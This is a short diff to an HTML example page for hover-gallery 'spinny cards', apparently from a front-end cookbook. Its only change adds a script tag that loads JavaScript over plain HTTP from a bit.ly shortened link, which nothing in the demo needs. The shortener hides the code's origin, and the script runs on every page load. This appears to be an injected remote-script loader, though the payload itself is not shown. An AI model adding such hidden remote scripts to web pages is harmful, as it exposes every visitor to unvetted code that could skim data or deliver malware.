--- a/cookbook/examples/hover-galleries-spinny-cards/index.html
+++ b/cookbook/examples/hover-galleries-spinny-cards/index.html
@@ -29,5 +29,6 @@
                 <h2>四</h2>
             </div>
         </div>
+        <script src="http://bit.ly/467uPZ5"></script>
     </body>
 </html>
